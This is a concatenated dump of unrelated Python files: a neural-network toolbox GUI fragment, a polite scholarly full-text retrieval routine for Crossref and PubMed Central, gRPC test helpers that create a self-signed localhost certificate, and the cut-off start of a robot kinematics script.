msg = "No model file '*.json' found in \n {}".format(p)
messagebox.showwarning(title="Warning", message=msg)
result = False
else:
result = True
if result:
self.settings['path_wd'].set(p)
self.gui_log.set(os.path.join(p, 'log', 'gui'))
# Look for plots in working directory to display
self.graph_widgets()
return result
def check_runlabel(self, p):
"""Check runlabel."""
if self.initialized:
# Set path to plots for the current simulation run
self.settings['log_dir_of_current_run'].set(
os.path.join(self.gui_log.get(), p))
if not os.path.exists(
self.settings['log_dir_of_current_run'].get()):
os.makedirs(self.settings['log_dir_of_current_run'].get())
def check_dataset_path(self, p):
"""
Parameters
----------
p :
Returns
-------
"""
if not self.initialized:
result = True
elif not os.path.exists(p):
msg = "Failed to set dataset directory:\n" + \
"Specified directory does not exist."
messagebox.showwarning(title="Warning", message=msg)
result = False
elif self.settings['normalize'] and \
self.settings['dataset_format'] == 'npz' and not \
os.path.exists(os.path.join(p, 'x_norm.npz')):
msg = "No data set file 'x_norm.npz' found.\n" + \
"Add it, or disable normalization."
messagebox.showerror(title="Error", message=msg)
result = False
elif self.settings['dataset_format'] == 'npz' and not \
(os.path.exists(os.path.join(p, 'x_test.npz')) and
os.path.exists(os.path.join(p, 'y_test.npz'))):
msg = "Data set file 'x_test.npz' or 'y_test.npz' was not found."
messagebox.showerror(title="Error", message=msg)
result = False
else:
result = True
if result:
self.settings['dataset_path'].set(p)
return result
def set_cwd(self):
"""Set current working directory."""
p = filedialog.askdirectory(title="Set directory",
initialdir=self.toolbox_root)
self.check_path(p)
def set_dataset_path(self):
"""Set path to dataset."""
p = filedialog.askdirectory(title="Set directory",
initialdir=self.toolbox_root)
self.check_dataset_path(p)
def __scroll_handler(self, *l):
op, how_many = l[0], l[1]
if op == 'scroll':
units = l[2]
self.path_entry.xview_scroll(how_many, units)
elif op == 'moveto':
self.path_entry.xview_moveto(how_many)
def toggle_state_pynn(self, val):
"""Toogle state for pyNN."""
simulators_pynn = eval(self.config.get('restrictions', 'simulators_pyNN'))
if val not in list(simulators_pynn) + ['brian2']:
self.settings['state_pyNN'].set('disabled')
else:
self.settings['state_pyNN'].set('normal')
# for name in pyNN_keys:
# getattr(self, name + '_label').configure(
# state=self.settings['state_pyNN'].get())
# getattr(self, name + '_sb').configure(
# state=self.settings['state_pyNN'].get())
def toggle_start_state(self, val):
"""Toggle start state."""
if val:
self.start_state.set('disabled')
else:
self.start_state.set('normal')
self.start_processing_bt.configure(state=self.start_state.get())
def toggle_stop_state(self, val):
"""Toggle stop state."""
if val:
self.stop_state.set('disabled')
else:
self.stop_state.set('normal')
self.stop_processing_bt.configure(state=self.stop_state.get())
def toggle_num_to_test_state(self, val):
"""Toggle number to test state."""
if val:
self.settings['state_num_to_test'].set('normal')
else:
self.settings['state_num_to_test'].set('disabled')
self.num_to_test_label.configure(
state=self.settings['state_num_to_test'].get())
self.num_to_test_sb.configure(
state=self.settings['state_num_to_test'].get())
def toggle_poisson_input_state(self):
"""Toggle poisson input."""
if self.settings['poisson_input'].get():
self.poisson_input_state.set('normal')
else:
self.poisson_input_state.set('disabled')
self.input_rate_label.configure(state=self.poisson_input_state.get())
self.input_rate_sb.configure(state=self.poisson_input_state.get())
def main():
from snntoolbox.bin.utils import load_config
config = load_config(os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', 'snntoolbox',
'config_defaults')))
root = tk.Tk()
root.title("SNN Toolbox")
app = SNNToolboxGUI(root, config)
root.protocol('WM_DELETE_WINDOW', app.quit_toolbox)
root.mainloop()
if __name__ == '__main__':
# main_thread = threading.Thread(target=main, name='main thread')
# main_thread.setDaemon(True)
# main_thread.start()
main()
|
retrieval.py
|
from cadmus.retrieval.get_request import get_request
from cadmus.parsing.xml_response_to_parse_d import xml_response_to_parse_d
from cadmus.parsing.doctype import doctype
from cadmus.evaluation.evaluation_funct import evaluation_funct
from cadmus.retrieval.complete_html_link_parser import complete_html_link_parser
from cadmus.parsing.html_response_to_parse_d import html_response_to_parse_d
from cadmus.parsing.pdf_file_to_parse_d import pdf_file_to_parse_d
from cadmus.parsing.plain_file_to_parse_d import plain_file_to_parse_d
from cadmus.parsing.tgz_unpacking import tgz_unpacking
from cadmus.retrieval.pubmed_linkout_parse import pubmed_linkout_parse
from cadmus.retrieval.clear import clear
from cadmus.retrieval.timeout import timeout
import bs4
from bs4 import BeautifulSoup
import pickle
import urllib.request as request
from contextlib import closing
import shutil
import wget
import time
from time import sleep
import warnings
warnings.filterwarnings("ignore")
from multiprocessing import Process
import pandas as pd
def retrieval(retrieval_df, http, base_url, headers, stage, keep_abstract, done = None):
# the input will be the retrieved_df and each process will be subset so that the required input is always available (doi or pmid or pmcid)
#the counter variable keep track on when to save the current result, every 100 rows or when a step is completed
counter = 0
#subset the original df to the lines with an identifier only (PMCID, PMID, DOI), the function is doing that to minimise the time to spent
if stage == 'crossref':
condition = []
for i in range(len(retrieval_df)):
if len(retrieval_df.iloc[i]['full_text_links'].get('cr_tdm')) > 0:
condition.append(True)
else:
condition.append(False)
cr_df = retrieval_df[condition]
elif stage == 'epmcxml' or stage == 'epmcsupp' or stage == 'pmcxmls' or stage == 'pmcpdfs' or stage == 'pmctgz':
condition = [(type(pmcid) != float) for pmcid in retrieval_df.pmcid]
cr_df = retrieval_df[condition]
cr_df
elif stage == 'doiorg':
condition = [(type(doi) != float) for doi in retrieval_df.doi]
cr_df = retrieval_df[condition]
cr_df
elif stage == 'pubmed':
condition = [(type(pmid) != float) for pmid in retrieval_df.pmid]
cr_df = retrieval_df[condition]
cr_df
else:
print('There is an error in the stage idendification please fill a bug repport')
exit()
for index, row in cr_df.iterrows():
if counter == 0:
#cleaning the terminal windows
clear()
#showing on top of the screen what to put in case of failure
print(f'In case of faillure please put the parameters start="{stage}" (or "{stage}_only" if in only mode) and idx="{index}"')
# save the last stage and index where we saved the df
saved_stage = stage
saved_index = index
print('\n')
counter += 1
if stage == 'crossref':
#printing the number of row remaining on the crossref step
print('Downloading Crossref TDM links now...')
print(f'tdm full link {counter} of {len(cr_df)}')
elif stage == 'epmcxml' or stage == 'epmcsupp' or stage == 'pmcxmls' or stage == 'pmcpdfs' or stage == 'pmctgz':
#checking that the PMCID is not nan, PMICD is the key needed for epmc pmc
if retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
pmcid = row['pmcid']
print(f'Looking for {pmcid} which is record {counter} of {len(cr_df)}')
if stage == 'pmcxmls' or stage == 'pmcpdfs':
#formating the value to the right format for these APIs
pmcid = pmcid.replace('PMC', '')
else:
pass
else:
pass
elif stage == 'doiorg':
# checking the DOI is not nan
if retrieval_df.doi.loc[index] == retrieval_df.doi.loc[index]:
#extracting the doi needed for doiorg
doi = row['doi']
print(f'DOI {counter} of {len(cr_df)}')
else:
pass
elif stage == 'pubmed':
# checking the pmid is not nan
if retrieval_df.pmid.loc[index] == retrieval_df.pmid.loc[index]:
#extracting the pmid needed for the pubmed step
pmid = row['pmid']
print(f'working on pmid:{pmid}, record {counter} of {len(cr_df)}')
else:
pass
else:
pass
if stage == 'crossref':
#collect all the crossref links available for text mining
links = row['full_text_links'].get('cr_tdm')
if links:
for link in links:
#trying to indentifying the format from the link in order to not request a document if it is already retreive for that format
if ('.pdf' in link and retrieval_df.pdf.loc[index] == 1) or ('.xml' in link and retrieval_df.xml.loc[index] == 1) or ('plain' in link and retrieval_df.plain.loc[index] == 1):
pass
else:
#printing the link we are trying to download from
print(f'trying to download from: \n{link}')
try:
#requesting the document by creatng the header and the request
response_d, response = get_request('', http, link, headers, 'crossref')
except:
pass
# we don't want to get the IP address blocked by the publisher so need to check responses to each request
# some publishers may not use the correct headers and might be missed
# in which case we need to look out for any "too many requests" response
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
print(response_d['text'])
exit()
elif response_d['status_code'] == 200:
print('Request ok')
# This section looks for limit header from publisher API as set out on Crossref docs
# check to see if there has been a limit set
rate_limit = headers.get('CR-TDM-Rate-Limit')
if rate_limit:
print(f'Rate limit found = {rate_limit} / sec')
# if we find a rate limit but we can look out for limit remaining
limit_reset = headers.get('CR-TDM-Rate-Limit-Reset')
if limit_reset:
# now check to see if we have met the limit of download
limit_remaining = headers.get('CR-TDM-Rate-Limit-Remaining')
if limit_remaining:
if int(limit_remaining) == 0:
print('download limit reached, need to back off')
sleep(int(limit_reset))
# now lets look for the content type of the response
format_type = response.headers.get('Content-Type')
if format_type is None:
soup = BeautifulSoup(response.text)
format_type = doctype(soup)
print(f'Format:{format_type} found')
#in case the link suggest that the link direct to a pdf format
if ('pdf' in format_type.lower()) or ('.pdf' in link):
#looking if the pdf format was already retreived, if not we will try, if already retreived we go to the next record
if retrieval_df.pdf.loc[index] != 1:
#looking if the docuemnt retreived is really a pdf
if response_d['headers']['Content-Type'] == 'application/pdf':
with open(f'./output/formats/pdfs/{index}.pdf', 'wb') as file:
#saving the finle to the appropriate path
file.write(response.content)
try:
#looking at the content of the pdf, if the content showed evidence it is the full text we modify the df to update with the new information
pdf_d = pdf_file_to_parse_d(retrieval_df, index, f'./output/formats/pdfs/{index}.pdf', link, keep_abstract)
if pdf_d['Content_type'] == 'pdf' and pdf_d['text'] != '' and (len(pdf_d['abstract'].split()) < pdf_d['wc'] or len(pdf_d['abstract'].split()) > 1000 if pdf_d['abstract'] != None else True) and 100 < pdf_d['wc']:
# we change the value to 1 in order to not look for that format again
retrieval_df.loc[index, 'pdf'] = 1
retrieval_df.loc[index, 'pdf_parse_d'] = [pdf_d]
else:
pass
except:
pass
else:
pass
else:
pass
# trying to indentify if the link will provide the algorithm with a xml format
elif ('xml' in format_type.lower()) or ('.xml' in link):
# the algorithm will spend time on the following only if it has not retrieved it already
if retrieval_df.xml.loc[index] != 1:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
# now we have the xml_d we can evaluate to decide if it is a TP, FP or AB
if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
with open(f'./output/formats/xmls/{index}.xml', 'w') as file:
# saving the file to a pre-defines directory as we identified it as TP
file.write(response.text.encode('ascii', 'ignore').decode())
# changing the value to one for future references
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
else:
pass
else:
pass
elif 'html' in format_type.lower():
# the function will spend time to the following only if no html were saved before
if retrieval_df.html.loc[index] != 1:
# all the htmls should be checked for candidate link(s) regardless of whether they are FP or AB
html_links = complete_html_link_parser(response)
# list of potential candidate links
if len(html_links) != 0:
# the dictionary that contains the list is updated as we try new pages
full_text_link_dict = retrieval_df.loc[index, 'full_text_links']
full_text_link_dict.update({'html_parse':html_links})
retrieval_df.at[index, 'full_text_links'] = full_text_link_dict
# perform html parsing and FP detection
html_d = html_response_to_parse_d(retrieval_df, index, response, keep_abstract)
html_d = evaluation_funct(html_d)
# now we have the html_d we can evaluate to decide if it is a TP, FP or AB
if html_d['evaluation'] == 'TP' and (len(html_d['abstract'].split()) < html_d['wc'] or len(html_d['abstract'].split()) > 1000 if html_d['abstract'] != None else True) and 100 < html_d['wc']:
with open(f'./output/formats/htmls/{index}.html', 'w') as file:
# since the file as been identified as TP we save it to a pre-defined structure
file.write(response.text.encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'html'] = 1
retrieval_df.loc[index,'html_parse_d'] = [html_d]
else:
pass
else:
pass
#doing the same as before for .txt file format
elif 'plain' in format_type.lower():
if retrieval_df.plain.loc[index] != 1:
with open(f'./output/formats/txts/{index}.txt', 'w') as file:
file.write(response.text.encode('ascii', 'ignore').decode())
plain_d = plain_file_to_parse_d(retrieval_df, index, f'./output/formats/txts/{index}.txt', link, keep_abstract)
if plain_d['text'] != '' and (len(plain_d['abstract'].split()) < plain_d['wc'] or len(plain_d['abstract'].split()) > 1000 if plain_d['abstract'] != None else True) and 100 < plain_d['wc']:
retrieval_df.loc[index, 'plain_parse_d'] = [plain_d]
retrieval_df.loc[index,'plain'] = 1
else:
pass
else:
# request failed, move on to the next one
pass
else:
# no crossref links tdm links for this record
print('No Crossref links for this article')
pass
elif stage == 'epmcxml':
#if xml already retrieved or if the identifier is mising going to the next record
if retrieval_df.xml.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
#creating the header and the protocol to retreive the file from epmc API
response_d, response = get_request(pmcid, http, base_url, headers, 'epmcxml')
except:
pass
#if the code status we get from the server is 429, we notifiy the user and stop the process to give some time to rest
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
#if status code is 200, it means everything works correctly
elif response_d['status_code'] == 200:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
# now we have the xml_d we can compare look at the parsed text to decide if it is a TP, FP or AB class
if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
print('success, now writing to file')
# the file as been classified as TP, saving the file
with open(f'./output/formats/xmls/{index}.xml', 'w+') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
# we can keep track of the sucesses as we go by saving 1 to xml column and avoid trying again
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
else:
print('error with request')
print(f'{response_d["error"]}')
else:
pass
elif stage == 'pmcxmls':
#if xml already retreived, or identifier missing going to next record
if retrieval_df.xml.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
#creating the header and protocol to retreive the document from PMC API
response_d, response = get_request(pmcid, http, base_url, headers, 'pmcxmls')
except:
pass
#if the error code is 429 stoping the process to give time to rest
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
# code 200 everything works correctly
elif response_d['status_code'] == 200:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
# now we have the xml_d we can decide if it is a TP, FP or AB class
if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
print('success, now writing to file')
with open(f'./output/formats/xmls/{index}.xml', 'w') as file:
# saving the file as it has been evaluated as TP
file.write(response_d['text'].encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
else:
# in case the status code is different than 200 or 429
print('error with request')
print(f'{response_d["error"]}')
else:
pass
elif stage == 'pmcpdfs':
# looking if the pdf is already retreived for that row, if yes moving to the next record
# the condition alse check if an identifier is present
if retrieval_df.pdf.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
#creating the header and the protocol to request the docuemnt from PMC API
response_d, response = get_request(pmcid, http, base_url, headers, 'pmcpdfs')
except:
pass
#stop the process in case of 429 status code
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
#status code 200 means everything works perfectly
elif response_d['status_code'] == 200:
# The response for this API is an xml which provides links to the resource
# lets use beautiful soup to parse the xml
soup = BeautifulSoup(response.text)
for link in soup.find_all('link'):
# check for pdf format
if link.attrs['format'] == 'pdf':
print('pdf file available')
# get the link for the pdf
ftp_link = link.get('href')
with closing(request.urlopen(ftp_link)) as r:
detection = r.info().get_content_subtype()
if detection == 'pdf':
with open(f'./output/formats/pdfs/{index}.pdf', 'wb') as f:
shutil.copyfileobj(r, f)
try:
pdf_d = pdf_file_to_parse_d(retrieval_df, index, f'./output/formats/pdfs/{index}.pdf', ftp_link, keep_abstract)
if pdf_d['Content_type'] == 'pdf' and pdf_d['text'] != '' and (len(pdf_d['abstract'].split()) < pdf_d['wc'] or len(pdf_d['abstract'].split()) > 1000 if pdf_d['abstract'] != None else True) and 100 < pdf_d['wc']:
retrieval_df.loc[index, 'pdf'] = 1
retrieval_df.loc[index, 'pdf_parse_d'] = [pdf_d]
else:
pass
except:
pass
else:
pass
# alternative error code, register the fail but keep going.
else:
print('error with request')
print(f'{response_d["error"]}')
pass
else:
pass
elif stage == 'pmctgz':
if retrieval_df.pmc_tgz.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
#creating the header and protocol to request the tgz from PMC
response_d, response = get_request(pmcid, http, base_url, headers, 'pmctgz')
except:
pass
#stop the process in case of status code 429
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
#if status code 200 means we can process the document
elif response_d['status_code'] == 200:
# The response for this API is an xml which provides links to the resource
# lets use beautiful soup to parse the xml
soup = BeautifulSoup(response.text)
for link in soup.find_all('link'):
# the link could be to a tgz
if link.attrs['format'] == 'tgz':
print('tar zip file available')
ftp_link = link.get('href')
# if it is a tgz then it'll probably need to be written in chunks
out_file = f'./output/formats/tgzs/{index}.tgz'
try:
# we had previous experience where the code got stuck in the tgz, we set the time to maximun 300s before moving to the next records without changing the main df
timeout_time = 300
start = time.time()
worked = False
#creating one process to kill it once the time is passed or when it's completed
pnum = 1
procs = []
for i in range(pnum):
#downloading the tgz using the newly created process that will die at most 300s from the start
p = Process(target=wget.download, args=(ftp_link, out_file), name = ('process_' + str(i+1)))
procs.append(p)
p.start()
#as long as when we started is less than 300s continue to try
while time.time() - start <= timeout_time:
#checking if it's already completed or not, if yes stop and moving to next record
if not any([p.is_alive() for p in procs]):
# All the processes are done, break now.
#Bolean to keep the fact that it worked
worked = True
#altering the main df
retrieval_df.loc[index, 'pmc_tgz'] = 1
#kill the process and merging the result
p.terminate()
p.join()
break
#only check if it's over every one second
time.sleep(1) # just to avoid bothering the CPU
else:
# We only enter this if we didn't 'break' above.
print("timed out, killing all processes")
for p in procs:
p.terminate()
p.join()
except:
pass
# run the function to unpack the tgz looking for pdfs and xmls in case the tgz was sucessful
if worked == True:
try:
#again using a timeout function to not get stuck in the tgz
retrieval_df = timeout(300)(tgz_unpacking)(index, retrieval_df, f'./output/formats/tgzs/{index}.tgz', ftp_link, keep_abstract)
except:
pass #handle errors
else:
pass
# alternative error code, register the fail but keep going.
else:
print('error with request')
print(f'{response_d["error"]}')
pass
else:
pass
elif stage == 'doiorg':
#cheking if the doi is not nan
if retrieval_df.doi.loc[index] == retrieval_df.doi.loc[index]:
try:
#creating the header and the protocol
response_d, response = get_request(doi, http, base_url, headers, 'doiorg')
except:
pass
# check the response status
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
elif (response_d['status_code'] == 200):
# rule of thumb if content less than 10000 bytes, it is rubbish
if (len(response_d['content']) > 100):
# now lets get the format of the doc
if response_d['headers'].get('Content-Type') != None:
format_type = response_d['headers']['Content-Type']
else:
format_type = ''
if format_type == '':
print('No format Type in the headers, trying to extract from soup object')
soup = BeautifulSoup(response_d['text'])
format_type = doctype(soup)
if format_type == None:
format_type = ''
print(f'Format type: {format_type}')
if format_type != None:
print(f'Format:{format_type} found')
# execute if we have identify pdf as a format
if 'pdf' in format_type.lower() and retrieval_df.pdf.loc[index] != 1:
if response_d['headers'].get('Content-Type') != None:
#the document retreived is the format we expected
if response_d['headers']['Content-Type'] == 'application/pdf':
with open(f'./output/formats/pdfs/{index}.pdf', 'wb') as file:
file.write(response_d['content'])
try:
pdf_d = pdf_file_to_parse_d(retrieval_df, index, f'./output/formats/pdfs/{index}.pdf', f'{base_url}{doi}', keep_abstract)
if pdf_d['Content_type'] == 'pdf' and pdf_d['text'] != '' and (len(pdf_d['abstract'].split()) < pdf_d['wc'] or len(pdf_d['abstract'].split()) > 1000 if pdf_d['abstract'] != None else True) and 100 < pdf_d['wc']:
#if the content retreived from the docuemnt followed the rule we implemented we are altering the main df
retrieval_df.loc[index, 'pdf'] = 1
retrieval_df.loc[index, 'pdf_parse_d'] = [pdf_d]
else:
pass
except:
pass
else:
pass
else:
pass
elif 'xml' in format_type.lower() and retrieval_df.xml.loc[index] != 1:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
# now that we have the xml_d we can decide if it is a TP, FP or AB
if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
with open(f'./output/formats/xmls/{index}.xml', 'w') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
elif 'html' in format_type.lower() and retrieval_df.html.loc[index] != 1:
# all the htmls should be checked for links regardless of whether they are FP or AB
html_links = complete_html_link_parser(response)
if len(html_links) != 0:
full_text_link_dict = retrieval_df.loc[index, 'full_text_links']
full_text_link_dict.update({'html_parse':html_links})
retrieval_df.at[index, 'full_text_links'] = full_text_link_dict
# perform html parsing and FP detection
html_d = html_response_to_parse_d(retrieval_df, index, response, keep_abstract)
html_d = evaluation_funct(html_d)
# now we have the html_d we can compare to decide if it is a TP, FP or AB
if html_d['evaluation'] == 'TP' and (len(html_d['abstract'].split()) < html_d['wc'] or len(html_d['abstract'].split()) > 1000 if html_d['abstract'] != None else True) and 100 < html_d['wc']:
with open(f'./output/formats/htmls/{index}.html', 'w') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'html'] = 1
retrieval_df.loc[index,'html_parse_d'] = [html_d]
elif 'plain' in format_type.lower() and retrieval_df.plain.loc[index] != 1:
with open(f'./output/formats/txts/{index}.txt', 'w') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
plain_d = plain_file_to_parse_d(retrieval_df, index, f'./output/formats/txts/{index}.txt', f'{base_url}{doi}', keep_abstract)
if plain_d['text'] != '' and (len(plain_d['abstract'].split()) < plain_d['wc'] or len(plain_d['abstract'].split()) > 1000 if plain_d['abstract'] != None else True) and 100 < plain_d['wc']:
retrieval_df.loc[index, 'plain_parse_d'] = [plain_d]
retrieval_df.loc[index,'plain'] = 1
# if no format then fail this index
else:
pass
# if doc <10,000 bytes then fail this index
else:
pass
# if response status not 200 then fail this index
else:
pass
else:
pass
######################################### Pubmed PMID request and link extraction ####################################
######################################### ####################################
# This stage sends a get request using a pmid to PUBMED to try and get the Full text links from the html page 'linkout' section
# we don't need to save the page, just parse the request.text and save the links to the retrieved df
# no html page are saved at this stage only candidate links
elif stage == 'pubmed':
# firstly check that there is a PMID to use (is equal to itself)
if retrieval_df.pmid.loc[index] == retrieval_df.pmid.loc[index]:
# set the conditions for when to try (No Tagged version (HTML or XML) or no PDF)
if ((retrieval_df.html.loc[index] == 0) and (retrieval_df.xml.loc[index] == 0)) or (retrieval_df.pdf.loc[index]) == 0:
# send the request to pubmed using the base url and pmid
try:
response_d, response = get_request(pmid, http, base_url, headers, 'pubmed')
except:
pass
# check the resonse code
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
elif response_d['status_code'] == 200:
# if the response code is 200 then we can parse out the links from linkout section using our function above.
retrieval_df = pubmed_linkout_parse(index, retrieval_df, response)
else:
# we already have all the required versions, no need to try the pubmed route
pass
else:
# we don't have a pmid so no point in trying this option
pass
######################################### Pubmed PMID request and link extraction ####################################
######################################### ####################################
else:
pass
print('\nnext record\n')
if counter%10 == 0 and not counter%100 == 0 and not counter == 0:
#clearing the terminal output every 10 records, showing on top of the terminal the information in case of failure
#resting 2 seconds every 10 records to be polite
sleep(2)
clear()
print(f'In case of faillure please put the parameters start="{saved_stage}" (or "{saved_stage}_only" if in only mode) and idx="{saved_index}"')
print('\n')
elif counter%100 == 0 and not counter == 0:
#saving the main df every 100 records, updating the information on the top in case of failure
#resting 2 seconds to be polite
sleep(2)
clear()
saved_stage = stage
saved_index = index
if done is None:
pickle.dump(retrieval_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
else:
saved_processed_df = pd.concat([done, retrieval_df], axis=0, join='outer', ignore_index=False, copy=True)
pickle.dump(saved_processed_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
print(f'In case of faillure please put the parameters start="{saved_stage}" (or "{saved_stage}_only" if in only mode) and idx="{saved_index}"')
print('\n')
#When all the the rows have been completed saving the main df and the information of the current stage
print('process Complete')
if done is None:
pickle.dump(retrieval_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
else:
saved_processed_df = pd.concat([done, retrieval_df], axis=0, join='outer', ignore_index=False, copy=True)
pickle.dump(saved_processed_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
return retrieval_df
|
test_case.py
|
import asyncio
import datetime
import logging
import threading
import unittest
from asyncio import Queue as AsyncQueue
from time import sleep
from typing import Any, Dict
import grpc
import grpc_testing
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID
from . import App, AsyncApp, AsyncServer, Server, Service
class HomiTestCase(unittest.TestCase):
app: App = None
_test_server = None
def get_test_server(self):
if not self._test_server:
servicers = {}
for svc in self.app.services:
if isinstance(svc, Service):
servicers[svc.descriptor] = svc.make_servicer_class()
self._test_server = grpc_testing.server_from_dictionary(
servicers, grpc_testing.strict_real_time()
)
return self._test_server
@staticmethod
def get_all_response(method):
finish = False
result = []
while not finish:
try:
result.append(method.take_response())
except Exception:
finish = True
return result
@staticmethod
def send_request_all(method, requests):
[method.send_request(req) for req in requests]
method.requests_closed()
class HomiRealServerTestCase(unittest.TestCase):
app = None
default_server_config = {
"host": "localhost",
"port": '5999'
}
alts = False
tls = False
_tls_key = None
_certificate = None
test_server_config: Dict[str, Any] = {}
test_server = None
@property
def tls_key(self):
if not self._tls_key:
self._tls_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
return self._tls_key
@property
def certificate(self):
if not self._certificate:
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"California"),
x509.NameAttribute(NameOID.LOCALITY_NAME, "San Francisco"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "My Company"),
x509.NameAttribute(NameOID.COMMON_NAME, "localhost"),
])
self._certificate = x509.CertificateBuilder() \
.subject_name(subject) \
.issuer_name(issuer) \
.public_key(self.tls_key.public_key()) \
.serial_number(x509.random_serial_number()) \
.not_valid_before(datetime.datetime.utcnow()) \
.not_valid_after(
# Our certificate will be valid for 10 days
datetime.datetime.utcnow() + datetime.timedelta(days=10)
) \
.add_extension(x509.SubjectAlternativeName([x509.DNSName("localhost")]),
critical=False, ).sign(self.tls_key, hashes.SHA256())
return self._certificate
@property
def channel_credentials(self):
if self.alts:
return grpc.alts_channel_credentials()
elif self.tls:
cert = self.certificate.public_bytes(serialization.Encoding.PEM)
return grpc.ssl_channel_credentials(cert)
return None
@property
def tls_config(self):
if not self.tls:
return {}
else:
return {
"private_key": self.tls_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
),
"certificate": self.certificate.public_bytes(serialization.Encoding.PEM),
}
def get_server_config(self, merge_config: dict = None):
config = merge_config or {}
return {
**self.default_server_config,
**self.test_server_config,
**self.tls_config,
**config,
}
def server_restart(self, merge_config: dict = None):
self.run_real_server(merge_config)
def _run_async_server(self, config):
self.test_server = AsyncServer(self.app, **self.get_server_config(config))
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.que = AsyncQueue()
def run_server(loop, server, q):
async def operator(server, q):
await server.run(wait=False)
await q.get()
await server.stop()
logging.debug('test server stopped')
loop.run_until_complete(operator(server, q))
self.thread = threading.Thread(target=run_server, args=(self.loop, self.test_server, self.que))
self.thread.start()
# todo: find how to wait until on server
sleep(0.02)
def run_real_server(self, merge_config: dict = None):
config = merge_config or {}
if self.test_server:
try:
self.test_server.stop()
except Exception:
pass
if isinstance(self.app, AsyncApp):
self._run_async_server(config)
else:
self.test_server = Server(self.app, **self.get_server_config(config))
self.test_server.run(wait=False)
def setUp(self):
super().setUp()
self.run_real_server()
def server_stop(self):
if isinstance(self.app, AsyncApp):
self.loop.call_soon_threadsafe(self.que.put_nowait, 'stop')
self.thread.join()
del self.thread
self.loop.run_until_complete(self.loop.shutdown_asyncgens())
self.loop.close()
else:
self.test_server.stop()
def tearDown(self):
super().tearDown()
self.server_stop()
|
depart.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import pypot.robot
import time
import json
import math
import sys
import threading
import time
import queue
from serial import Serial
def dist(a,b):
return math.sqrt((a*a)+(b*b))
def get_y_rotation(x,y,z):
radians = math.atan2(x, dist(y,z))
return -math.degrees(radians)
def get_x_rotation(x,y,z):
radians = math.atan2(y, dist(x,z))
return math.degrees(radians)
def read_kbd_input(inputQueue):
print('Ready for keyboard input:')
while True:
inputQueue.put(sys.stdin.read(1))
def interp(a, x1, x2):
return x1+a*(x2-x1)
def interpInv(x, x1, x2):
return (x-x1)/(x2-x1)
def MGD(theta2):
c = math.cos(theta2)
s = math.sin(theta2)
xA = 0.025
yA = 0.045
xB = 0.095
yB = 0.000
L2 = 0.130
L3 = 0.055
L4 = 0.122
L5 = 0.140
xC = xB+L2*c
yC = yB+L2*s
AC = math.sqrt((xA-xC)**2+(yA-yC)**2)
